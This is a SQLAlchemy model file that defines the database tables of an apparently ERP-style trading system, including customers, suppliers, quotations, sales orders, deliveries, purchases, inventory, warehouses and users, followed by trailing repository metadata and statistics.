__tablename__ = 'customer'
id = Column(Integer, primary_key=True)
company_name = Column(String(100), nullable=False, server_default=text("''"))
company_address = Column(String(100), nullable=False, server_default=text("''"))
company_site = Column(String(100), nullable=False, server_default=text("''"))
company_tel = Column(String(100), nullable=False, server_default=text("''"))
company_fax = Column(String(100), nullable=False, server_default=text("''"))
company_email = Column(String(100), nullable=False, server_default=text("''"))
company_type = Column(Integer, nullable=False, server_default=text("'0'"))
owner_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class CustomerContact(Base):
__tablename__ = 'customer_contact'
id = Column(Integer, primary_key=True)
cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
name = Column(String(20), nullable=False, server_default=text("''"))
salutation = Column(String(20), nullable=False, server_default=text("''"))
mobile = Column(String(20), nullable=False, server_default=text("''"))
tel = Column(String(20), nullable=False, server_default=text("''"))
fax = Column(String(20), nullable=False, server_default=text("''"))
email = Column(String(60), nullable=False, server_default=text("''"))
department = Column(String(20), nullable=False, server_default=text("''"))
address = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(256), nullable=False, server_default=text("''"))
status_default = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class CustomerInvoice(Base):
__tablename__ = 'customer_invoice'
cid = Column(Integer, primary_key=True)
company_name = Column(String(100), nullable=False, server_default=text("''"))
company_tax_id = Column(String(20), nullable=False, server_default=text("''"))
company_address = Column(String(100), nullable=False, server_default=text("''"))
company_tel = Column(String(100), nullable=False, server_default=text("''"))
company_bank_name = Column(String(100), nullable=False, server_default=text("''"))
company_bank_account = Column(String(100), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Delivery(Base):
__tablename__ = 'delivery'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
sales_order_id = Column(Integer, index=True, server_default=text("'0'"))
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
customer_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
type_delivery = Column(Integer, nullable=False, server_default=text("'0'"))
amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_delivery = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
warehouse_id = Column(Integer, nullable=False)
note = Column(String(256), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_confirm = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
audit_time = Column(DateTime)
confirm_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class DeliveryItems(Base):
__tablename__ = 'delivery_items'
id = Column(Integer, primary_key=True)
delivery_id = Column(Integer, nullable=False, index=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
sales_order_id = Column(Integer, index=True, server_default=text("'0'"))
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
custom_production_brand = Column(String(32), nullable=False, server_default=text("''"))
custom_production_model = Column(String(64), nullable=False, server_default=text("''"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(16), nullable=False, server_default=text("''"))
production_model = Column(String(32), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
warehouse_id = Column(Integer, nullable=False)
rack_id = Column(Integer, nullable=False)
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Enquiry(Base):
__tablename__ = 'enquiry'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_enquiry = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
delivery_way = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(256), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_order = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
expiry_date = Column(Date, nullable=False)
audit_time = Column(DateTime)
order_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class EnquiryItems(Base):
__tablename__ = 'enquiry_items'
id = Column(Integer, primary_key=True)
enquiry_id = Column(Integer, nullable=False, index=True)
uid = Column(Integer, nullable=False, index=True)
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
enquiry_production_model = Column(String(64), nullable=False, server_default=text("''"))
enquiry_quantity = Column(Integer, nullable=False, server_default=text("'0'"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
delivery_time = Column(String(128), nullable=False, server_default=text("''"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
status_ordered = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Futures(Base):
__tablename__ = 'futures'
__table_args__ = (
Index('production_model', 'production_model', 'production_brand'),
)
id = Column(Integer, primary_key=True)
supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
production_brand = Column(String(16), nullable=False, server_default=text("''"))
production_model = Column(String(32), nullable=False, server_default=text("''"))
currency = Column(String(3), nullable=False, server_default=text("'CNY'"))
req_date = Column(Date, nullable=False, server_default=text("'0000-00-00'"))
acc_date = Column(Date, nullable=False, server_default=text("'0000-00-00'"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
sub_total = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Inventory(Base):
__tablename__ = 'inventory'
id = Column(Integer, primary_key=True)
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
warehouse_id = Column(Integer, nullable=False)
warehouse_name = Column(String(100), nullable=False, server_default=text("''"))
rack_id = Column(Integer, nullable=False)
rack_name = Column(String(16), nullable=False, server_default=text("''"))
stock_qty_initial = Column(Integer, nullable=False, server_default=text("'0'"))
stock_qty_current = Column(Integer, nullable=False, server_default=text("'0'"))
note = Column(String(256), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Production(Base):
__tablename__ = 'production'
__table_args__ = (
Index('production_brand', 'production_brand', 'production_model', unique=True),
)
id = Column(Integer, primary_key=True)
category_id = Column(Integer, nullable=False, server_default=text("'0'"))
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, index=True, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
production_class = Column(String(32), nullable=False, server_default=text("''"))
ind = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
oud = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
wid = Column(Numeric(4, 0), nullable=False, server_default=text("'0'"))
speed_g = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
speed_o = Column(Numeric(6, 0), nullable=False, server_default=text("'0'"))
weight = Column(Numeric(8, 3), nullable=False, server_default=text("'0.000'"))
serie = Column(String(32), nullable=False, server_default=text("''"))
accuracy = Column(String(64), nullable=False, server_default=text("''"))
preload = Column(String(64), nullable=False, server_default=text("''"))
seal = Column(String(64), nullable=False, server_default=text("''"))
angle = Column(String(64), nullable=False, server_default=text("''"))
r_size = Column(String(64), nullable=False, server_default=text("''"))
r_matel = Column(String(64), nullable=False, server_default=text("''"))
assembly_no = Column(String(64), nullable=False, server_default=text("''"))
assembly_type = Column(String(64), nullable=False, server_default=text("''"))
note = Column(String(64), nullable=False, server_default=text("''"))
cost_ref = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
cost_new = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
cost_avg = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
tag = Column(String(256), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class ProductionSensitive(Base):
__tablename__ = 'production_sensitive'
__table_args__ = (
Index('customer_cid_2', 'customer_cid', 'production_id', unique=True),
)
id = Column(Integer, primary_key=True)
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
note = Column(String(256), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Purchase(Base):
__tablename__ = 'purchase'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
buyer_order_id = Column(Integer, index=True, server_default=text("'0'"))
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
supplier_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
type_purchase = Column(Integer, nullable=False, server_default=text("'0'"))
amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_purchase = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
warehouse_id = Column(Integer, nullable=False)
note = Column(String(256), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_confirm = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
audit_time = Column(DateTime)
confirm_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class PurchaseItems(Base):
__tablename__ = 'purchase_items'
id = Column(Integer, primary_key=True)
purchase_id = Column(Integer, nullable=False, index=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
buyer_order_id = Column(Integer, index=True, server_default=text("'0'"))
supplier_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
supplier_company_name = Column(String(100), nullable=False, server_default=text("''"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(16), nullable=False, server_default=text("''"))
production_model = Column(String(32), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
warehouse_id = Column(Integer, nullable=False)
rack_id = Column(Integer, nullable=False)
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(8, 2), nullable=False, server_default=text("'0.00'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Quotation(Base):
__tablename__ = 'quotation'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_quotation = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
delivery_way = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(256), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_order = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
expiry_date = Column(Date, nullable=False)
audit_time = Column(DateTime)
order_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class QuotationItems(Base):
__tablename__ = 'quotation_items'
id = Column(Integer, primary_key=True)
quotation_id = Column(Integer, nullable=False, index=True)
uid = Column(Integer, nullable=False, index=True)
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
enquiry_production_model = Column(String(64), nullable=False, server_default=text("''"))
enquiry_quantity = Column(Integer, nullable=False, server_default=text("'0'"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
delivery_time = Column(String(128), nullable=False, server_default=text("''"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
status_ordered = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Rack(Base):
__tablename__ = 'rack'
id = Column(Integer, primary_key=True)
warehouse_id = Column(Integer, nullable=False)
name = Column(String(16), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SalesOrder(Base):
__tablename__ = 'sales_order'
id = Column(Integer, primary_key=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_contact_id = Column(Integer, nullable=False, server_default=text("'0'"))
amount_production = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_shipping = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_adjustment = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
amount_order = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
delivery_way = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(256), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
audit_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_audit = Column(Integer, nullable=False, server_default=text("'0'"))
status_effect = Column(Integer, nullable=False, server_default=text("'0'"))
status_completion = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
audit_time = Column(DateTime)
effect_time = Column(DateTime)
completion_time = Column(DateTime)
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SalesOrderItems(Base):
__tablename__ = 'sales_order_items'
id = Column(Integer, primary_key=True)
sales_order_id = Column(Integer, nullable=False, index=True)
uid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
customer_company_name = Column(String(100), nullable=False, server_default=text("''"))
custom_production_brand = Column(String(32), nullable=False, server_default=text("''"))
custom_production_model = Column(String(64), nullable=False, server_default=text("''"))
production_id = Column(Integer, nullable=False, index=True)
production_brand = Column(String(32), nullable=False, server_default=text("''"))
production_model = Column(String(64), nullable=False, server_default=text("''"))
production_sku = Column(String(16), nullable=False, server_default=text("'Pcs'"))
delivery_time = Column(String(128), nullable=False, server_default=text("''"))
quantity = Column(Integer, nullable=False, server_default=text("'0'"))
unit_price = Column(Numeric(10, 2), nullable=False, server_default=text("'0.00'"))
note = Column(String(64), nullable=False, server_default=text("''"))
type_tax = Column(Integer, nullable=False, server_default=text("'1'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SiteConfig(Base):
__tablename__ = 'site_config'
id = Column(Integer, primary_key=True)
name_cn = Column(String(60), nullable=False, unique=True, server_default=text("''"))
name_en = Column(String(60), nullable=False, server_default=text("''"))
address_cn = Column(String(100), nullable=False, server_default=text("''"))
address_en = Column(String(100), nullable=False, server_default=text("''"))
mobile = Column(String(20), nullable=False, server_default=text("''"))
tel = Column(String(20), nullable=False, server_default=text("''"))
fax = Column(String(20), nullable=False, server_default=text("''"))
email = Column(String(60), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Supplier(Base):
__tablename__ = 'supplier'
id = Column(Integer, primary_key=True)
company_name = Column(String(100), nullable=False, server_default=text("''"))
company_address = Column(String(100), nullable=False, server_default=text("''"))
company_site = Column(String(100), nullable=False, server_default=text("''"))
company_tel = Column(String(100), nullable=False, server_default=text("''"))
company_fax = Column(String(100), nullable=False, server_default=text("''"))
company_email = Column(String(100), nullable=False, server_default=text("''"))
company_type = Column(Integer, nullable=False, server_default=text("'0'"))
owner_uid = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SupplierContact(Base):
__tablename__ = 'supplier_contact'
id = Column(Integer, primary_key=True)
cid = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
name = Column(String(20), nullable=False, server_default=text("''"))
salutation = Column(String(20), nullable=False, server_default=text("''"))
mobile = Column(String(20), nullable=False, server_default=text("''"))
tel = Column(String(20), nullable=False, server_default=text("''"))
fax = Column(String(20), nullable=False, server_default=text("''"))
email = Column(String(60), nullable=False, server_default=text("''"))
department = Column(String(20), nullable=False, server_default=text("''"))
address = Column(String(100), nullable=False, server_default=text("''"))
note = Column(String(256), nullable=False, server_default=text("''"))
status_default = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class SupplierInvoice(Base):
__tablename__ = 'supplier_invoice'
cid = Column(Integer, primary_key=True)
company_name = Column(String(100), nullable=False, server_default=text("''"))
company_tax_id = Column(String(20), nullable=False, server_default=text("''"))
company_address = Column(String(100), nullable=False, server_default=text("''"))
company_tel = Column(String(100), nullable=False, server_default=text("''"))
company_bank_name = Column(String(100), nullable=False, server_default=text("''"))
company_bank_account = Column(String(100), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class User(Base):
__tablename__ = 'user'
id = Column(Integer, primary_key=True)
name = Column(String(20, u'utf8mb4_bin'), nullable=False, unique=True, server_default=text("''"))
salutation = Column(String(20), nullable=False, server_default=text("''"))
mobile = Column(String(20), nullable=False, server_default=text("''"))
tel = Column(String(20), nullable=False, server_default=text("''"))
fax = Column(String(20), nullable=False, server_default=text("''"))
email = Column(String(60), nullable=False, server_default=text("''"))
role_id = Column(Integer, nullable=False, server_default=text("'0'"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class UserAuth(Base):
__tablename__ = 'user_auth'
__table_args__ = (
Index('type_auth', 'type_auth', 'auth_key', unique=True),
)
id = Column(Integer, primary_key=True)
user_id = Column(Integer, nullable=False, index=True, server_default=text("'0'"))
type_auth = Column(Integer, nullable=False, server_default=text("'0'"))
auth_key = Column(String(60, u'utf8mb4_bin'), nullable=False, server_default=text("''"))
auth_secret = Column(String(60, u'utf8mb4_bin'), nullable=False, server_default=text("''"))
status_verified = Column(Integer, nullable=False, server_default=text("'0'"))
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
class Warehouse(Base):
__tablename__ = 'warehouse'
id = Column(Integer, primary_key=True)
name = Column(String(100), nullable=False, unique=True, server_default=text("''"))
address = Column(String(100), nullable=False, server_default=text("''"))
linkman = Column(String(20), nullable=False, server_default=text("''"))
tel = Column(String(20), nullable=False, server_default=text("''"))
fax = Column(String(20), nullable=False, server_default=text("''"))
status_delete = Column(Integer, nullable=False, server_default=text("'0'"))
delete_time = Column(DateTime)
create_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP"))
update_time = Column(DateTime, nullable=False, server_default=text("CURRENT_TIMESTAMP ON UPDATE CURRENT_TIMESTAMP"))
| 60.233418
| 120
| 0.721788
| 5,902
| 47,223
| 5.555066
| 0.033887
| 0.191515
| 0.236442
| 0.329897
| 0.947417
| 0.945556
| 0.939883
| 0.92933
| 0.916153
| 0.904593
| 0
| 0.021527
| 0.12352
| 47,223
| 783
| 121
| 60.310345
| 0.770597
| 0.000275
| 0
| 0.797317
| 0
| 0
| 0.084837
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.00149
| false
| 0
| 0.002981
| 0.00149
| 0.973174
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
76ae366de6a09065de482a480359f621fb1ab980
| 224
|
py
|
Python
|
ex3.py
|
scotteza/learn-python-3-the-hard-way
|
0ef5f64aae6f78e1afd81361771ae27b155d8f7e
|
[
"MIT"
] | null | null | null |
ex3.py
|
scotteza/learn-python-3-the-hard-way
|
0ef5f64aae6f78e1afd81361771ae27b155d8f7e
|
[
"MIT"
] | null | null | null |
ex3.py
|
scotteza/learn-python-3-the-hard-way
|
0ef5f64aae6f78e1afd81361771ae27b155d8f7e
|
[
"MIT"
] | null | null | null |
print("Hens", 25 + 30 / 6)
print("Roosters", 100 - 25 * 3 / 4)
print(3 + 2 + 1 - 5 + 4 % 2 - 1 / 4 + 6)
print(3 + 2 < 5 - 7)
print(5 > -2)
print(5 >= -2)
print(5 <= -2)
print (3%2)
print (4%2)
print (12/7)
print (22/7)
| 13.176471
| 40
| 0.482143
| 47
| 224
| 2.297872
| 0.319149
| 0.277778
| 0.194444
| 0.333333
| 0.240741
| 0.240741
| 0.240741
| 0
| 0
| 0
| 0
| 0.25
| 0.267857
| 224
| 16
| 41
| 14
| 0.408537
| 0
| 0
| 0
| 0
| 0
| 0.053571
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 7
|
76cbed852b90e5d320a99892707bd0602c15fd62
| 4,790
|
py
|
Python
|
lib/data/cifar.py
|
liqi17thu/Stand-Alone-Self-Attention
|
43c016ca14a9f5ce7ab59eefe2c41d96df04d151
|
[
"MIT"
] | 1
|
2020-11-29T15:59:07.000Z
|
2020-11-29T15:59:07.000Z
|
lib/data/cifar.py
|
liqi17thu/Stand-Alone-Self-Attention
|
43c016ca14a9f5ce7ab59eefe2c41d96df04d151
|
[
"MIT"
] | null | null | null |
lib/data/cifar.py
|
liqi17thu/Stand-Alone-Self-Attention
|
